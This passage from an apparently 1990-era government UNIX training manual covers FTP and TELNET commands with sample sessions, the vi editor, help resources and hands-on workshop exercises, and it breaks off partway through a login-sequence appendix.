+ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>help get ³ +³ get receive file ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + + +There is a synonym for the help command. It works in the same +way as the help command. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: ? [command] º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>? put ³ +³ put send one file ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +FTP status can be displayed on the screen by entering the +following command: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: status º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ftp>status ³ +³ Connected to ERC830. ³ +³ No proxy connection. ³ +³ Mode: stream; Type: ascii; Form: non-print; Structure: file ³ +³ Verbose: on; Bell: off; Prompting: on; Globbing: on ³ +³ Store unique: off; Receive unique: off ³ +³ Case: off; CR stripping: on ³ +³ Ntrans: off ³ +³ Nmap: off ³ +³ Hash mark printing: off; Use of PORT cmds: on ³ +³ ftp> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +These are the default settings. The meaning of these settings +and how to change them are found in the supplemental material at +the end of this manual. + +There are a few "bugs" in FTP. + +Correct execution of many FTP commands depends upon the remote +server. The VAX server is supplied by The Wollongong Group, Inc. +If you encounter problems transferring files to/from the +Multimax, please bring them to the attention of the User Support +Branch or call the Hotline (FTS 776-4688 or 6-HOTT). +7.8 Introducing UMAX TELNET + + +TELNET protocol will allow communication with another host. The +TELNET protocol can be invoked from either the Annex prompt or +from the shell prompt while you are logged into the Multimax. If +you invoke TELNET while logged into the Multimax, that session +will continue to be charged at the appropriate rate. The new +session to another host will also charge the account. This means +you are paying connect charges on both systems. + +The syntax to invoke TELNET is as follows: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º º +º Command Format: telnet [host [port]] º +º º +º host - the host name º +º º +º port - the port number, if not given, use default º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $telnet ³ +³ telnet> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The telnet> prompt indicates that telnet commands can now be +entered. If no parameters are given, telnet enters the command +mode. + +In order to create a connection to another host from command +mode, use the open command. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command format: open [port] º +º º +º host - host name º +º º +º port - port number, optional º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ +Sample session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ telnet>open erc830 ³ +³ Trying... ³ +³ Connected to erc830. ³ +³ Escape character is '^]'. ³ +³ ³ +³ (Warning message from VAX) ³ +³ ³ +³ Username: ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +If you enter the host name on the same command line as telnet, +the open command will be done for you. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $telnet erc830 ³ +³ Trying... ³ +³ Connected to erc830. ³ +³ Escape character is '^]'. ³ +³ ³ +³ ( Warning message from VAX) ³ +³ ³ +³ Username: ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +When you logout of the destination host, you will be +automatically brought back to the originating host. + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ $lo ³ +³ Connection closed by foreign host .L-1990 15:57:42.19 ³ +³ $ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +The first $ prompt is the VMS prompt. The lo command logs you +out of the VAX. Notice that we get the connection closed +message, and the next $ prompt is back to the Multimax. +The connection that was created was closed. There is a TELNET +command to close the connection as well. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: close º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +This TELNET command will close the connection and return to the +TELNET command mode. + +To exit TELNET, enter the following command at the telnet> +prompt. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: quit º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +This command will close any open TELNET session and exit TELNET. +An end-of-file (in command mode) will also close a session and +exit. + +The current status of TELNET can be shown by entering the +following command: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: status º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ telnet>status ³ +³ Connected to erc830. ³ +³ Operating in character-at-a-time mode. ³ +³ Escape character is '^]'. ³ +³ ³ +³ telnet> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +A listing of TELNET commands can be displayed by entering the +following command at the TELNET command mode prompt telnet>: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: help º +º º +º ? º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Sample Session: + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ telnet>help ³ +³ Commands may be abbreviated. Commands are: ³ +³ ³ +³ close close current connection ³ +³ display display operating parameters ³ +³ mode try to enter line-by-line or char-at-a-time mode ³ +³ open connect to a site ³ +³ quit exit telnet ³ +³ send transmit special characters ('send ?' for more) ³ +³ set set operating parameters ('set ?' for more) ³ +³ status print status information ³ +³ toggle toggle operating parameters ('toggle ?' for more) ³ +³ z suspend telnet ³ +³ ? print help information ³ +³ telnet> ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +Workshop 7 + + +This workshop will reinforce your understanding of the topics +covered in this chapter. Login to the Multimax with the username +and password given to you by the instructor. Each student is to +complete the entire workshop. Computer exercises might need to +be worked as a team. + + +COMPUTER EXERCISES + + +1. Log into the Multimax. + +Questions 2 through 11 have to do with a connection between the +local computer (Multimax) and the remote computer (VAX). + + +2. Initialize FTP on the Multimax and create a connection to + the VAX. (Hint: open) + + + What is the remote computer default username? + How can you enter a different username? + + + + +3. What files are on the remote computer's directory? + (Hint: If you can't remember the FTP command, how can you + find out?) + + + + + +4. What is the default type? (Hint: status) + + + + + + + Continue on the next page +5. Transfer the file "memo" from the Multimax to the VAX. + Change the name of the file on the VAX to "memo.doc". + + + + +6. Transfer the file "DATA.MAY" from the VAX to the Multimax. + Keep the same filename on both platforms. + + + + +7. Without entering it, what FTP command would you enter to + change the remote computer working directory to + D_1131:[STUDENT]? + + + + +8. Enter the FTP command to list the contents of the local + computer working directory. What files are present? + + + + +9. Enter the FTP command to list the contents of the remote + computer working directory. What files are present? + + + + +10. Without entering the command, how would you change the + remote working directory to D_1131:[STUDENT1]? + + + + +11. What changes would you have to make in order to + transfer a binary file from the Multimax to the VAX? + + + + Continue on the next page + ** NOTE ** + +Questions 12 through 20 have to do with a connection between the +local computer (Multimax) and the remote computer (CYBER). + + +12. Close the connection with the VAX and then open a connection + to the CYBER. + + + + +13. What files are on the remote computer's directory? + + + + + +14. What is the default type? (Hint: status) + + + + + +15. Transfer the file "memo" from the Multimax to the CYBER. + Change the name on the CYBER to a filename of your choice. + + + + +16. Transfer the file "MAYDATA" from the CYBER to the Multimax. + Keep the same filename on both platforms. + + + + +17. Without entering it, what FTP command would you enter to + change the remote computer working directory? + + + + +18. Enter the FTP command to list the contents of the local + computer working directory. + + + + + + + + Continue on the next page +19. Enter the FTP command to list the contents of the remote + computer working directory. + + + + +20. Close the connection with the CYBER and exit FTP. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Continue on the next page + ** NOTE ** + +The following questions have to do with your understanding of the +Telnet communications protocol. + + +21. Enter the command to invoke the Telnet protocol. + + + + + +22. Open a connection to the VAX. + + + + + +23. Enter a valid username and password. + + + + + +24. Are you logged into the VAX or the Multimax? + + + + +25. Enter the command to exit the VAX. (Hint: logoff) + + + + + +26. Are you logged into the VAX or the Multimax? + + + + + +27. Are you confused? Logout of the Multimax and the Annex. + + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +8. INTRODUCTION TO vi + + +The vi editor was developed at the University of California, +Berkeley. It was originally included as part of BSD UNIX. It +became an official part of AT&T UNIX with the release of System +V. Before vi was invented, the standard UNIX editor was ed. The +ed editor was line oriented and made it difficult to see the +context of the file being edited. + +The next progression was an editor called ex. The ex editor had +some distinct advantages over ed. It allowed you to display an +entire screen of text instead of just one line at a time. While +in the ex editor, you could give the command vi (for visual +mode). Users used the visual mode so much that developers of ex +made it possible to use the display editing feature without +having to enter ex and then vi. They called the new facility +simply vi. + +The vi editor does its work in a work buffer. When you start vi, +it copies the disk file into the work buffer. During the editing +session, changes are made to this copy. The contents of the disk +file are not changed until you write the contents of the work +buffer to the disk file. + +The command to enter the vi editor is: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: vi º +º º +º file1 - the filename to edit º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +Your screen is cleared, then the first lines of the file are +displayed, and the cursor is positioned at the top of the screen. +The bottom line of your screen is reserved for certain command +mode activities and for error and status messages and does not +contain any of the file's text. If the file already exists, the +bottom line lists the filename in quotes and the number of lines +and characters it contains. If the file is new, "New file" is +displayed next to the filename. If the file does not fill an +entire screen, a tilde (~) character appears in the leftmost +column of any blank lines. + +By default, you are always in command mode at the start of a vi +session. The most common command mode activities are: + + cursor positioning + entering text mode + moving, copying, and deleting text + storing changes + quitting +Whenever you wish to return to command mode, or are unsure of +what mode you are in, press the Esc key. + +Esc can be entered any number of times without harm. The Esc key +on the VT terminals is the Ctrl-3 combination. On the PC, it is +the key marked Esc. +8.1 vi: Cursor Positioning + + +Below is a list of cursor positioning commands. Characters are +not echoed on your screen when one of these commands is executed. +The cursor simply moves to the desired location. If a command is +not accepted, the cursor remains where it is. The current line +is defined as the line on which the cursor currently resides. +The letter N is a repeat factor. + + +N+ move down N lines from current line. The cursor can be + anyplace on the current line. When complete, the + cursor will be located at the first character on the + line N lines down from the current line. + + +N- move up N lines from current line. The cursor can be + anyplace on the current line. When complete, the + cursor will be located on the first character on the + line located N lines up from the current line. + +(Ret) The cursor can be located anyplace on the current line. + The will be on the first character of the next line. + +$ The cursor will move to the end of the current line + +NG This command will move the cursor to line N. Default + is to move to the last line. + + +Ctrl-D move down 1/2 screen (11 lines) + +Ctrl-U move up 1/2 screen (11 lines) + + +NOTE: Words are delimited by spaces (ie., a word + begins and ends with a space). + + +Nw The cursor will be on the first character of the word + located N words from the current word. The current + word is the word where the cursor is located. The + default is to skip to the beginning of the next word. + +Nb The cursor will be on the first character of the word + located N words back from the current word. The + default is to skip back to the beginning of the + previous word. + +e The cursor will skip to the end of the current word. +The following keys are also defined for moving around the screen: + +h back one space + +j down one line + +k up one line + +l forward one space + +The arrow keys will also work. + +CAUTION NOTE: If you hold the arrow key down to move quickly to + another area of the text, a line might be inserted + into your file. +8.2 vi: Text Mode + + +Several commands in command mode allow you to enter text. Once +the command is entered, all other characters that you type are +inserted in your text until you press the Esc key. + + +To add text, use: + +I enter text mode, additional text appears at the beginning of + the current line. + +i enter text mode, additional text appears before the current + cursor position. + +A enter text mode, additional text appears at the end of the + current line. + +a enter text mode, additional text appears after the current + position. + +O enter text mode, open a line above the current line. + +o enter text mode, open a line below the current line. + + +To replace text, use: + +R replace characters until Esc + +r replace one character at current cursor position, then + return to command mode + + +To substitute text, use: + +Ns substitute character for the current N characters until + Esc. Default is to substitute for the current + character until Esc. +8.3 vi: Deleting Text + + +vi commands for deleting text take effect relative to the +cursor's current position. Text deletion commands are not echoed +on your screen. + +Ndd delete N lines starting at the current line. The + default is to delete the current line. + +Ndw delete N words starting with the current word. The + default is to delete the current word. + +Nx delete N characters starting at the current cursor + position. The default is to delete one character. + +D delete remainder of line +8.4 vi: Copying Text + + +Copying text is performed using one of the "yank and put" command +pairs. The most straight forward command sequence for copying +is: + + 1. Yank a word, line, or number of lines. A copy of the + yanked text is stored invisibly. The original text is + not disturbed. + + 2. Move the cursor to the desired location. + + 3. Put the yanked copy into place. + + 4. Move the cursor to the next block of text you want to + copy, then go to step 1. + + +Here are some yank and put commands: + + +NY yank N lines. Default is to yank one line. + +Nyw yank N words. Default is to yank one word. + +P put yanked lines above current cursor position + or + put yanked words before current cursor position + + +p put yanked lines below current cursor position + or + put yanked words after current cursor position +8.5 vi: Moving Text + + +Moving text from one area to another can be accomplished in +several different ways. You can use whichever method is the +easiest for you to remember. + + 1. Yank, put, and delete: + + a. Yank the desired text. + + b. Move the cursor to the new location and then "put" + the "yanked" text into its new location. + + c. Move the cursor back to the original text and + delete it. + + + or + + 2. Delete and put: + + a. Delete the desired text + + b. Move the cursor to the new location + + c. Use a put command to add the text. + + + +NOTE: The delete command stores an invisible copy + of the deleted text in a buffer. This is + done so the undo command is capable of + restoring the previous command. That's why + it is possible to move that deleted text to + another area. +8.6 vi: Restoring the Last Change + + +The Undo command will reverse the last command you just entered. +It will restore text that you have changed or deleted by mistake. +The undo command will undo only the most recently changed text. + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: u º +º º +º u - undo the last change º +º º +º U - restore the current line to the way it was before you º +º started changing it, even if several changes were made º +º º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + +If you delete a line and then change a word, undo will restore +the changed word but will not restore the line. +8.7 vi: Recovering Text After a Crash + + +You can often recover text that would have been lost because of a +system crash. When the system has been brought back up enter the +following command to see if the system saved a copy of your work +buffer: + + +Example: + +................................................................. +. $vi -r filename . +................................................................. + + +If your work buffer was saved, you will be editing a recent copy +of the work buffer. Use the w command to write the edited +version to the disk file. + +The -r option will recover the version of filename that was in +the buffer when the crash occurred. If no buffer was saved, the +editor will assume you are going to edit a new empty file called +filename. +8.8 vi: Saving Text and Quitting + + +Commands to save (write) text and to quit are entered from the +Last Line Mode. The Last Line Mode is entered by entering a +colon (:) character from the command mode. + +To save changes without exiting vi, enter: + + +Example: + +................................................................. +. :w . +................................................................. + +This command is displayed on the status line as it is typed in. +The commands are executed by pressing the Enter key. The file's +name and number of lines and characters are displayed on the +status line. With no option, the work buffer will be written +back to the original disk file. If, for some reason, you don't +have write permission to the working directory, you can copy the +work buffer to another file by specifying the complete pathname +of a temporary file. + + +Example: + +................................................................. +. :w /user0/rharding/temp . +................................................................. + +Now you can exit vi and not lose any of your work. The editing +session is saved in the file /user/rharding/temp. + +To exit vi without saving any of the changes since the last :w +(or to discard all changes if no :w), enter: + + +Example: + +................................................................. +. :q! . +................................................................. + +The exclamation mark (!) (in slang, it's a bang) indicates to +quit the current editing session, regardless. If you just enter +q alone, the editor will warn you that existing changes were not +saved. It is difficult to get out of this mode. Use the +exclamation mark to indicate do the exit no matter what and not +save the changes since the last w command. +To save and quit, enter: + + +Example: + +................................................................. +. :wq . +................................................................. + +The w command will write the work buffer to the disk file. The q +command will exit the editor. The shell prompt ($) will be +displayed after the file has been saved and the editor exited. +8.9 Other vi Commands + + +To save the file you are editing under a different name, use: + + +Example: + +................................................................. +. :w newfile . +................................................................. + +To copy in the contents of another file, position the cursor on +the last line you want to be above the new text, then execute: + + +Example: + +................................................................. +. :r filename . +................................................................. + +The contents of filename will appear on your screen below the +last cursor position. The existing text will be moved down. + +To include the output of a shell command (i.e., date) in the file +you are editing, position the cursor as described above, then +enter: + + +Example: + +................................................................. +. :r !shell-cmd . +................................................................. + +To execute a shell command without including its output in your +file, enter: + + +Example: + +................................................................. +. :!shell-cmd . +................................................................. + +This feature enables you to check man pages or the contents of +other files without exiting vi. + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +Workshop 8 + + +This workshop will reinforce your understanding of the topics +covered in this chapter. Login to the Multimax with the username +and password given to you by the instructor. Each student is to +complete the entire workshop. Computer exercises might need to +be worked as a team. + +1. Login to the Multimax. + + + + +2. Edit the file rocket.sh . + (Hint: vi rocket.sh) + + + +3. Position the cursor at the beginning of line 10. + + + + +4. Move the cursor up five lines. + + + + +5. Move the cursor to the end of the current line. + What vi command did you use? + + + +6. Move the cursor to the first line of the file. + What vi command did you use? + + + +7. Move to the end of the file and insert a new line after it + that contains the following text: + + fi + + +8. Remove all the blank lines from this file. + + + + + + Continue on the next page +9. Locate the word grop and change it to grep . + + + + + +10. Add the following text after the last line of the file. + + rm ./temp$$ + + + + +11. Now execute the script by typing rocket.sh + + (Hint: What are the permissions on this file?) + + If you did the editing correctly fireworks should appear. If + not, compare your script to /user0/teacher/rocket.sh + + To stop the fireworks enter the interrupt character (CTRL-C) + + + +12. Create a file with a name of your own choice. Insert the + output from the UNIX command ls -la . Save your change and + exit vi. + + + + + +13. Edit the file you just created. Go to the end of the file + and without leaving vi, display a listing of the directory + /user0/teacher. How do you return to the editing session? + Did the listing get inserted into your editing session? + + + + + + + + +13. What is the option to recover your changes after a system + crash? + + + + + +14. Logout of the Multimax and the Annex. +9. GETTING HELP + + +9.1 Assist + + +The assist command is a menu driven utility that can provide +information on the following topics: + + 1. Information on a variety of UNIX topics + + 2. Tutorials + + 3. The ability to construct and execute command lines + + 4. A "pop up" menu for advanced users + + +Assist is set up so you do not have to know the exact command +name in order to get information or use the command. To execute +assist enter: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: assist [name] º +º assist [-s] º +º assist [-c name] º +º º +º name - invoke an assist-supported UNIX system or º +º walkthru for name. º +º º +º -s - reinvoke the assist setup module to check or º +º modify the terminal variable. º +º º +º -c name - invoke the version of name that is in the º +º current directory. º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ +Sample session: + +................................................................. +. $assist . +................................................................. + +The first time assist is executed, assist will automatically +check your terminal capabilities and then runs a brief tutorial. +You can run the tutorial again by entering: + + +Sample session: + +................................................................. +. $assist -s . +................................................................. + +This command will also allow you to recheck your terminal setup. + +The following is a list of useful assist commands: + + Ctrl-A - assist help + + Ctrl-O - help with current menu + + Ctrl-Y - help with current menu item + + Ctrl-T - call top level menu + + Ctrl-F - call "pop up" menu + + Ctrl-R - go back to previous menu + + (Ret),Ctrl-N - move cursor to next menu item + + Ctrl-P - return cursor to previous item + + Ctrl-G - select (execute) current menu item + + Ctrl-V - clear help message or prompt + + Ctrl-D - exit + + +Assist contains information on many, but not all, of the UMAX +commands. In addition, not all options and possibilities for +each command are covered. For complete information about a UMAX +command, please use the on-line manual pages. +9.2 UNIX Primer Plus + + +This manual is intended to be the reference manual for UNIX. It +has several handy features. The inside of the front cover has a +listing of UNIX command and the page number on which a +description of the command and its options can be found. In +addition, there are some quick reference sheets that can be +removed from the book and used at your terminal. The book is +well written, humorous, and contains a lot of information about +UNIX. There might be subtle differences between generic UNIX and +UMAX. + +Another manual that is a good reference for UNIX is "A Practical +Guide to UNIX System V" by Mark G. Sobell. + + +9.3 TAB (Technical Assistance Bulletin) + + +The TAB is published monthly and contains current articles and +helpful hints for the Multimax minicomputers and UNIX in general. +To be added to the mailing list to receive a FREE subscription, +contact Gloria Armstrong (FTS) 776-4433 or (303) 236-4433. + + + +9.4 Local Support + + +If you have a local technical person that is available, try them. +Some regional offices have a hotline that you can call for +assistance. + + + +9.5 CCS Hotline + + +The is a technical Hotline service available in the Denver +office. This service is available to the entire Bureau. This is +the fastest way to get your questions answered. The Hotline +number is (FTS) 776-HOTT (4688) or Commercial (303) 236-HOTT +(4688). +9.6 CBT (DOS based training for UNIX) + + +There is a Computer Based Training course available on a PC in +the Denver training room. It runs under DOS and doesn't need to +be connected to a UNIX machine. It is easy to use and has +lessons for the beginning and advanced UNIX user, as well as +courses in C programming and UNIX system administration. It can +also give you instruction about a particular command or topic +that interests you. +Workshop 9 + + +Lucky you! No workshop + + + +Please complete the... + + Summary Workshop + + and + + Course Evaluation + NOTES +ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ +APPENDIX A: DENVER OFFICE LOGIN SEQUENCE + + + PRESS Space Bar + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ WELCOME TO THE B.O.R. NETWORK P/S:B ³ +³ SYSTEMS PRESENTLY AVAILABLE ARE: ³ +³ ³ +³ **SYSTEM** **NAME** ³ +³ ³ +³ VAX 8300'S VAX ³ +³ CYBER/CDCNET F.E. CDC ³ +³ ENCORE/UNIX MAX ³ +³ OUT DIAL OD ³ +³ ³ +³ TO SELECT A SYSTEM, ENTER THE SYSTEM ³ +³ NAME AND CARRIAGE RETURN AT NEXT ³ +³ PROMPT. ³ +³ ³ +³ CHANNEL 04/010. ENTER RESOURCE MAX ³ +³ CONNECTED TO 04/052 ³ 